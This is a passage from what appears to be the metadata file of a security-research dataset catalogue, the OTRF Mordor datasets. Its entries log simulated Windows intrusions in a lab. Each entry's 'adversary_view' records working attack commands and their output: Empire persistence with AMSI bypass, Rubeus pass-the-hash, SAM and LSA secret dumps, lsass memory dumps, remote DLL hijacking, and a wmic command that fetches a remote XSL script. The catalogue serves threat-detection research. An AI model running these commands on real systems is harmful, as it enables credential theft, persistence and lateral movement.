172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5088 5/0.0 2020-09-21 21:43:06 http \n\n4SUZ8X62 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 4092 5/0.0 2020-09-21 21:57:21 http \n\n(Empire: agents) > interact 4SUZ8X62\n(Empire: 4SUZ8X62) > usemodule persistence/elevated/schtasks*\n(Empire: powershell/persistence/elevated/schtasks) > set AMSIBypass2 True\n(Empire: powershell/persistence/elevated/schtasks) > set TaskName MordorElevated\n(Empire: powershell/persistence/elevated/schtasks) > info\n\n Name: Invoke-Schtasks\n Module: powershell/persistence/elevated/schtasks\n NeedsAdmin: True\n OpsecSafe: False\n Language: powershell\nMinLanguageVersion: 2\n Background: False\n OutputExtension: None\n\nAuthors:\n @mattifestation\n @harmj0y\n\nDescription:\n Persist a stager (or script) using schtasks running as\n SYSTEM. 
This has a moderate detection/removal rating.\n\nComments:\n https://github.com/mattifestation/PowerSploit/blob/master/Pe\n rsistence/Persistence.psm1\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True 4SUZ8X62 Agent to run module on. \n Listener False http Listener to use. \n Obfuscate False False Switch. Obfuscate the launcher \n powershell code, uses the \n ObfuscateCommand for obfuscation types. \n For powershell only. \n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use. \n Only used if Obfuscate switch is True. \n For powershell only. \n AMSIBypass False True Include mattifestation's AMSI Bypass in \n the stager code. \n AMSIBypass2 False True Include Tal Liberman's AMSI Bypass in \n the stager code. \n DailyTime False Daily time to trigger the script \n (HH:mm). \n IdleTime False User idle time (in minutes) to trigger \n script. \n OnLogon False True Switch. Trigger script on user logon. \n TaskName True MordorElevated Name to use for the schtask. \n RegPath False HKLM:\\Software\\Microsoft Registry location to store the script \n \\Network\\debug code. Last element is the key name. \n ADSPath False Alternate-data-stream location to store \n the script code. \n ExtFile False Use an external file for the payload \n instead of a stager. \n Cleanup False Switch. Cleanup the trigger and any \n script from specified location. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). \n Proxy False default Proxy to use for request (default, none,\n or other). \n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). \n\n(Empire: powershell/persistence/elevated/schtasks) > execute\n[>] Module is not opsec safe, run? 
[y/N] y\n[*] Tasked 4SUZ8X62 to run TASK_CMD_WAIT\n[*] Agent 4SUZ8X62 tasked with task ID 1\n[*] Tasked agent 4SUZ8X62 to run module powershell/persistence/elevated/schtasks\n(Empire: powershell/persistence/elevated/schtasks) > \nSUCCESS: The scheduled task \"MordorElevated\" has successfully been created.\nSchtasks persistence established using listener http stored in HKLM:\\Software\\Microsoft\\Network\\debug with MordorElevated OnLogon trigger.\n\n(Empire: powershell/persistence/elevated/schtasks) > back\n(Empire: 4SUZ8X62) > shell shutdown /r\n[*] Tasked 4SUZ8X62 to run TASK_SHELL\n[*] Agent 4SUZ8X62 tasked with task ID 2\n(Empire: 4SUZ8X62) > \n..Command execution completed.\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent Y2ADR48N checked in\n[*] New agent D43KCT91 checked in\n[+] Initial agent Y2ADR48N from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to Y2ADR48N at 172.18.39.5\n[+] Initial agent D43KCT91 from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to D43KCT91 at 172.18.39.5\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- \n5LKFT4WY ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 7172 5/0.0 2020-09-21 21:28:46 http \nM43EPU58 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5088 5/0.0 2020-09-21 21:43:06 http \n\n4SUZ8X62 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 4092 5/0.0 2020-09-21 21:59:29 http \nY2ADR48N ps 172.18.39.5 WORKSTATION5 *THESHIRE\\SYSTEM powershell 620 5/0.0 2020-09-21 22:01:50 http \nD43KCT91 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\SYSTEM powershell 636 5/0.0 2020-09-21 22:01:51 http \n\n(Empire: agents) > "}, "references": null}, "SDWIN-200921230246": {"title": "Rubeus Elevated ASKTGT CreateNetOnly", "id": "SDWIN-200921230246", "contributors": 
["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["Over-Pass-The-Hash", "Not Touching LSASS"], "description": "This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.", "attack_mappings": [{"technique": "T1003", "sub-technique": "003", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_rubeus_asktgt_createnetonly.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_shell_rubeus_asktgt_createnetonly.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": null}, {"type": "binary", "name": "Rubeus", "module": "asktgt", "script": "https://github.com/GhostPack/Rubeus"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: G6BYHU4F) > shell C:\\users\\sbeavers\\Desktop\\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /createnetonly:C:\\Windows\\System32\\cmd.exe\n[*] Tasked 4EH9PC5S to run TASK_SHELL\n[*] Agent 4EH9PC5S tasked with task ID 4\n(Empire: 4EH9PC5S) > \n______ _ \n (_____ \\ | | \n _____) )_ _| |__ _____ _ _ ___ \n | __ /| | | | _ \\| ___ | | | |/___)\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\n |_| |_|____/|____/|_____)____/(___/\n\n v1.5.0 \n\n[*] Action: Ask TGT\n\n[*] Showing process : False\n[+] Process : 'C:\\Windows\\System32\\cmd.exe' successfully created with LOGON_TYPE = 9\n[+] ProcessID : 10064\n[+] LUID : 0x42e7ba4\n\n[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8\n[*] Target LUID : 70155172\n[*] Building AS-REQ (w/ preauth) for: 
'theshire.local\\pgustavo'\n[+] TGT request successful!\n[*] base64(ticket.kirbi):\n\n doIFPjCCBTqgAwIBBaEDAgEWooIETTCCBElhggRFMIIEQaADAgEFoRAbDlRIRVNISVJFLkxPQ0FMoiMw\n IaADAgECoRowGBsGa3JidGd0Gw50aGVzaGlyZS5sb2NhbKOCBAEwggP9oAMCARKhAwIBAqKCA+8EggPr\n UHw92ESRb2uzf7C3GBZL2lN1UdDFIhvklZB/K21vINZO3G+ExWvoUxSVQQ+vYABaHcPGGeuYhXxRTwZB\n kPGYa0cFXtMSdSvXCGWVLz6LFPTco3puJNx4d0exgnjTBUp3MUQMw8x2CACCL9Cv0RYN+Wy4WLTzIF0t\n StYJk0I6g+vob7jOOAE6h8wp3XDfArkfcGndJmzBAgx5IeAL10yYArod69MykefCt3/uIbNJ9waMhov4\n cUInkStzt0QcFTZbvNgC30Dhew3jkzRBd5XxCHGMWkhY60ibhvfw5czUgAJ8VcsKfG+X1zkwIGRXxRhc\n c8COT4Z9614twkwjQ50FiRIxZBWHkxAKvzrwDtVE5v2alwfy827Sse85RoXPebKH11RMy8vFyPKsz4F8\n 46Wv5F0wXPf1vEl5z99KatYf+DtBpYg+ZO7S6pT9Ov/dRkdKMBCNp/hCuiL4imjlpMaMoqiXaWSA0E61\n 8ihQGj/qHXns2u4vujlrx/lvxgf/uCqanH5MYBviyFyvVDeuYw5yHQ0LXaf9aOcnOg3XnwJJfks/u+FZ\n FjDnfvubv1nNaPQ9QtzM2P5Y3U6/14a4Ks6XNocwWBbtAOXZ0ttzs+W1S7sXjSuPlZ3uye4yLMEV+u3h\n BwFoAQVl7usydsTx8Cur3FZQagYbdnJt6wOk5MtR7AlJvZ9WwJ6AOsaTFRyQ7rrHN6kFQklPELMCV7Dl\n 5bR79T31hC7wEQ/eFWMuL9EeurCD20mhoDQCqLttEetwEi7R8LXE/shPKZNY/4cFhWtODbtUzMLzNo3W\n pvxOPNce0dB4lv8frBVFqumyMDKxcDkjEZv7uQaMH+ofWaAPARnRSzYSK+Bf8ECJTg4Cz5aHp4Mz6rJb\n 1UcyQ1KyS150j0L/bIGfXr6u+CDKCvQ8w+h8p0gfqaqiNOyVfVdrHxxqcfnxrTOBoxNXwm02PomiGoH9\n T/uFchWCsM7OyCe1v05QT3jSi5Z2yHBmFWHLei96zm4Vu7JRkcQukE79q4Tb4OdiKuub0TByaDSAkC7a\n sd4QWyOew6gfbfJmAMkFAJnnAtIObcbeXBM/++sK1kpbs7fOVkCZP3w5arGsaY0zwwU9o/amWWalGrNd\n 4jZq1xRJau7zwANNKTpEmXm10LGtdODlTpUfYSJTne97WzUBFLLMvUOMsVOeotm11qflE/BXU/MVmPJa\n 7aaOEtApZHcHhQb+/u55SmrHXs1NQGtFsbBKotR7miHsOUqjhRBOmbjXEz8St4MoHqf7aJcIy20IoW8Q\n ASNHJSJHuDLJ5j+Wf+x0pV9dl03ocbaxWvtNzNw8drbo8bh2EWJmA9BdsKOB3DCB2aADAgEAooHRBIHO\n fYHLMIHIoIHFMIHCMIG/oBswGaADAgEXoRIEEE6gkql0M63etr3rDe/EiAyhEBsOVEhFU0hJUkUuTE9D\n QUyiFTAToAMCAQGhDDAKGwhwZ3VzdGF2b6MHAwUAQOEAAKURGA8yMDIwMDkyMjAzMDMwN1qmERgPMjAy\n MDA5MjIxMzAzMDdapxEYDzIwMjAwOTI5MDMwMzA3WqgQGw5USEVTSElSRS5MT0NBTKkjMCGgAwIBAqEa\n MBgbBmtyYnRndBsOdGhlc2hpcmUubG9jYWw=\n[*] Target LUID: 0x42e7ba4\n[+] Ticket 
successfully imported!\n\n ServiceName : krbtgt/theshire.local\n ServiceRealm : THESHIRE.LOCAL\n UserName : pgustavo\n UserRealm : THESHIRE.LOCAL\n StartTime : 9/21/2020 11:03:07 PM\n EndTime : 9/22/2020 9:03:07 AM\n RenewTill : 9/28/2020 11:03:07 PM\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable\n KeyType : rc4_hmac\n Base64(key) : TqCSqXQzrd62vesN78SIDA==\n\n\n..Command execution completed.\n\n(Empire: 4EH9PC5S) > "}, "references": ["https://github.com/GhostPack/Rubeus#example-over-pass-the-hash"]}, "SDWIN-200922042230": {"title": "Empire Powerdump Extract Hashes", "id": "SDWIN-200922042230", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/22", "modification_date": "2020/09/22", "platform": ["Windows"], "type": "atomic", "tags": ["Calculating SysKey", "SAM Read"], "description": "This dataset represents adversaries calculating the SysKey to decrypt Security Account Mannager (SAM) database entries (from registry or hive) and get NTLM, and sometimes LM hashes of local accounts password.", "attack_mappings": [{"technique": "T1003", "sub-technique": "002", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_powerdump_sam_access.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "powerdump", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: powershell/credentials/mimikatz/sam) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nWE8XYD3K ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5972 5/0.0 2020-09-22 08:21:35 
http \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > usemodule credentials/powerdump*\n(Empire: powershell/credentials/powerdump) > info\n\n Name: Invoke-PowerDump\n Module: powershell/credentials/powerdump\n NeedsAdmin: True\n OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: True\n OutputExtension: None\n\nAuthors:\n DarkOperator\n winfang\n Kathy Peters\n ReL1K\n\nDescription:\n Dumps hashes from the local system using Posh-SecMod's\n Invoke-PowerDump\n\nComments:\n https://github.com/darkoperator/Posh-\n SecMod/blob/master/PostExploitation/PostExploitation.psm1\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True WE8XYD3K Agent to run module on. \n\n(Empire: powershell/credentials/powerdump) > execute\n[*] Tasked WE8XYD3K to run TASK_CMD_JOB\n[*] Agent WE8XYD3K tasked with task ID 4\n[*] Tasked agent WE8XYD3K to run module powershell/credentials/powerdump\n(Empire: powershell/credentials/powerdump) > \nJob started: TASK2D\n\nwardog:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n\n(Empire: powershell/credentials/powerdump) >"}, "references": null}, "SDWIN-201009173318": {"title": "Covenant Remote WMI Wbemcomn DLL Hijacking", "id": "SDWIN-201009173318", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/09", "modification_date": "2020/10/09", "platform": ["Windows"], "type": "atomic", "tags": ["SMB CreateRequest"], "description": "This dataset represents adversaries abusing a DLL hijack vulnerability found in the execution of the WMI provider host (wmiprvse.exe) for lateral movement.", "attack_mappings": [{"technique": "T1047", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Remote WMI 
Wbemcomn DLL Hijack", "link": "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_wmi_wbemcomn_dll_hijack.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_wmi_wbemcomn_dll_hijack.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "ShellCmd", "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"}, {"type": "C2", "name": "Covenant", "module": "Copy", "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/DefaultGruntTasks.yaml#L951"}], "permissions_required": ["Administrator"], "adversary_view": "Copy /source:\"C:\\ProgramData\\test.dll\" /destination:\"\\\\WORKSTATION6\\C$\\Windows\\System32\\wbem\\wbemcomn.dll\"\n\nShellCmd /shellcommand:\"wmic /node:WORKSTATION6 os get\""}, "references": ["https://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/"]}, "SDWIN-201009183000": {"title": "Covenant Remote DCOM Iertutil DLL Hijacking", "id": "SDWIN-201009183000", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/09", "modification_date": "2020/10/09", "platform": ["Windows"], "type": "atomic", "tags": ["SMB CreateRequest"], "description": "This dataset represents adversaries abusing a DLL hijack vulnerability found in the execution of the DCOM InternetExplorer.Application class for lateral movement.", "attack_mappings": [{"technique": "T1021", "sub-technique": "003", "tactics": ["TA0008"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Remote DCOM IErtUtil DLL Hijack", "link": 
"https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_dcom_iertutil_dll_hijack.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_dcom_iertutil_dll_hijack.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "PowerShell", "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L529"}, {"type": "C2", "name": "Covenant", "module": "Copy", "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/DefaultGruntTasks.yaml#L951"}], "permissions_required": ["Administrator"], "adversary_view": "Copy /source:\"C:\\ProgramData\\test2.dll\" /destination:\"\\\\WORKSTATION6\\C$\\Program Files\\Internet Explorer\\iertutil.dll\"\n\nPowerShell /powershellcommand:\"$i=[activator]::CreateInstance([type]::GetTypeFromProgID('InternetExplorer.Application','172.18.39.6'))\""}, "references": ["https://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/"]}, "SDWIN-201012183248": {"title": "Covenant Wuauclt CreateRemoteThread Execution", "id": "SDWIN-201012183248", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/12", "modification_date": "2020/10/12", "platform": ["Windows"], "type": "atomic", "tags": ["CreateRemoteThread"], "description": "This dataset represents adversaries proxy executing code via the Windows Update client utility. 
In order to bypass rules looking for the binary reaching out directly to the Internet, this dataset shows the binary creating and running a thread in the virtual address space of another process via the CreateRemoteThread API.", "attack_mappings": [{"technique": "T1218", "sub-technique": null, "tactics": ["TA0005"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Signed Binary Proxy Execution via CreateRemoteThread", "link": "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-201012183248.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/covenant_lolbin_wuauclt_createremotethread.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "ShellCmd", "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"}], "permissions_required": ["Administrator"], "adversary_view": "Upload /filepath:\"C:\\ProgramData\\SimpleInjection.dll\"\n\nShellCmd /shellcommand:\"C:\\Windows\\System32\\wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\SimpleInjection.dll /RunHandlerComServe\""}, "references": ["https://dtm.uk/wuauclt/"]}, "SDWIN-201017061100": {"title": "WMIC Remote XSL Jscript Execution", "id": "SDWIN-201017061100", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/17", "modification_date": "2020/10/17", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents adversaries proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (jscript).", "attack_mappings": [{"technique": "T1220", "sub-technique": null, "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": 
"https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/wmic_remote_xsl_jscript.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "ART", "module": "wmicscript", "script": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"}], "permissions_required": ["Administrator"], "adversary_view": "wmic process list /FORMAT:\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\""}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/910a2a764a66b0905065d8bdedb04b37049a85db/atomics/T1220/T1220.md#atomic-test-4---wmic-bypass-using-remote-xsl-file", "https://twitter.com/dez_/status/986614411711442944"]}, "SDWIN-201018195009": {"title": "Lsass Memory Dump via Comsvcs.dll", "id": "SDWIN-201018195009", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/18", "modification_date": "2020/10/18", "platform": ["Windows"], "type": "atomic", "tags": ["art.2536dee2-12fb-459a-8c37-971844fa73be"], "description": "This dataset represents adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", "attack_mappings": [{"technique": "T1003", "sub-technique": "001", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_lsass_memory_dump_comsvcs.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Powershell", "module": "Powershell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-3---dump-lsassexe-memory-using-comsvcsdll"}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 
(Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-3---dump-lsassexe-memory-using-comsvcsdll", "https://twitter.com/shantanukhande/status/1229348874298388484", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/"]}, "SDWIN-201018225619": {"title": "Lsass Memory Dump via Syscalls", "id": "SDWIN-201018225619", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/18", "modification_date": "2020/10/18", "platform": ["Windows"], "type": "atomic", "tags": ["art.7ae7102c-a099-45c8-b985-4c7a2d05790d"], "description": "This dataset represents adversaries using system calls (syscalls) and API unhooking to dump the memoty contents of lsass.", "attack_mappings": [{"technique": "T1003", "sub-technique": "001", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_lsass_memory_dumpert_syscalls.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-4---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking"}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Users\\wardog\\Desktop>Outflank-Dumpert.exe\n________ __ _____.__ __\n\\_____ \\ __ ___/ |__/ ____\\ | _____ ____ | | __\n / | \\| | \\ __\\ __\\| | \\__ \\ / \\| |/ /\n/ | \\ | /| | | | | |__/ __ \\| | \\ <\n\\_______ /____/ |__| |__| |____(____ /___| /__|_ \\\n \\/ \\/ \\/ \\/\n Dumpert\n By Cneeliz @Outflank 2019\n\n[1] Checking OS version details:\n [+] Operating System is Windows 10 or Server 2016, build number 18363\n [+] Mapping version specific System calls.\n[2] Checking Process details:\n [+] Process ID of 
lsass.exe is: 756\n [+] NtReadVirtualMemory function pointer at: 0x00007FFB929DC890\n [+] NtReadVirtualMemory System call nr is: 0x3f\n [+] Unhooking NtReadVirtualMemory.\n[3] Create memorydump file:\n [+] Open a process handle.\n [+] Dump lsass.exe memory to: \\??\\C:\\windows\\Temp\\dumpert.dmp\n [+] Dump succesful.\n\nC:\\Users\\wardog\\Desktop>"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-4---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking", "https://github.com/outflanknl/Dumpert", "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/"]}, "SDWIN-201019002900": {"title": "SAM Copy via Esentutl VSS", "id": "SDWIN-201019002900", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/19", "modification_date": "2020/10/19", "platform": ["Windows"], "type": "atomic", "tags": ["art.a90c2f4d-6726-444e-99d2-a00cd7c20480"], "description": "This dataset represents adversaries copying the SAM hive using the esentutl.exe utility and volume shadow copy services.", "attack_mappings": [{"technique": "T1003", "sub-technique": "002", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_sam_copy_esentutl.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy"}], "permissions_required": ["Administrator"], "adversary_view": "Microsoft Windows [Version 10.0.18363.1139]\n(c) 2019 Microsoft Corporation. 
All rights reserved.\n\nC:\\Users\\wardog>esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d C:\\ProgramData\\SAM\n\nExtensible Storage Engine Utilities for Microsoft(R) Windows(R)\nVersion 10.0\nCopyright (C) Microsoft Corporation. All Rights Reserved.\n\nInitializing VSS subsystem...\n\nInitiating COPY FILE mode...\n Source File: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\System32\nDestination File: C:\\ProgramData\\SAM\n\n Copy Progress (% complete)\n\n 0 10 20 30 40 50 60 70 80 90 100\n |----|----|----|----|----|----|----|----|----|----|\n ...................................................\n\n Total bytes read = 0x9000 (36864) (0 MB)\n Total bytes written = 0x9000 (36864) (0 MB)\n\n\nOperation completed successfully in 4.859 seconds.\n\nC:\\Users\\wardog>"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy"]}, "SDWIN-201019033054": {"title": "Psexec Reg LSA Secrets Dump", "id": "SDWIN-201019033054", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/19", "modification_date": "2020/10/19", "platform": ["Windows"], "type": "atomic", "tags": ["art.55295ab0-a703-433b-9ca4-ae13807de12f"], "description": "This dataset represents adversaries using psexec to run reg.exe as system and dump LSA secrets. 
Location HKLM\\security\\policy\\secrets.", "attack_mappings": [{"technique": "T1003", "sub-technique": "004", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_psexec_lsa_secrets_dump.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md#atomic-test-1---dumping-lsa-secrets"}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Users\\wardog\\Downloads\\PSTools>PsExec.exe -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets\n\nPsExec v2.2 - Execute processes remotely\nCopyright (C) 2001-2016 Mark Russinovich\nSysinternals - www.sysinternals.com\n\n\nThe operation completed successfully.\nreg exited on WORKSTATION5 with error code 0.\n\nC:\\Users\\wardog\\Downloads\\PSTools>"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md#atomic-test-1---dumping-lsa-secrets"]}, "SDWIN-201019224718": {"title": "Logon Scripts via UserInitMprLogonScript", "id": "SDWIN-201019224718", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/19", "modification_date": "2020/10/19", "platform": ["Windows"], "type": "atomic", "tags": ["art.d6042746-07d4-4c92-9ad8-e644c114a231"], "description": "This dataset represents adversaries leveraging logon initialization scripts to achieve persistence via the UserInitMprLogonScript user environment.", "attack_mappings": [{"technique": "T1037", "sub-technique": "001", "tactics": ["TA0003"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/cmd_userinitmprlogonscript_batch.zip"}], "simulation": {"environment": "Lab VM", "tools": 
[{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}], "permissions_required": ["Administrator"], "adversary_view": "Microsoft Windows [Version 10.0.18363.1139]\n(c) 2019 Microsoft Corporation. All rights reserved.\n\nC:\\Users\\wardog>echo \"echo Art Logon Script atomic test was successful. >> %USERPROFILE%\\desktop\\T1037.001-log.txt\" > %temp%\\art.bat\n\nC:\\Users\\wardog>REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d %temp%\\art.bat /f\nThe operation completed successfully."}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"]}, "SDWIN-201019232515": {"title": "Mavinject Process DLL Injection", "id": "SDWIN-201019232515", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/19", "modification_date": "2020/10/19", "platform": ["Windows"], "type": "atomic", "tags": ["art.74496461-11a1-4982-b439-4d87a550d254"], "description": "This dataset represents adversaries leveraging", "attack_mappings": [{"technique": "T1055", "sub-technique": null, "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_mavinject_dll_notepad.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "powershell", "module": "powershell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md#atomic-test-1---process-injection-via-mavinjectexe"}], "permissions_required": ["Administrator"], "adversary_view": "PS 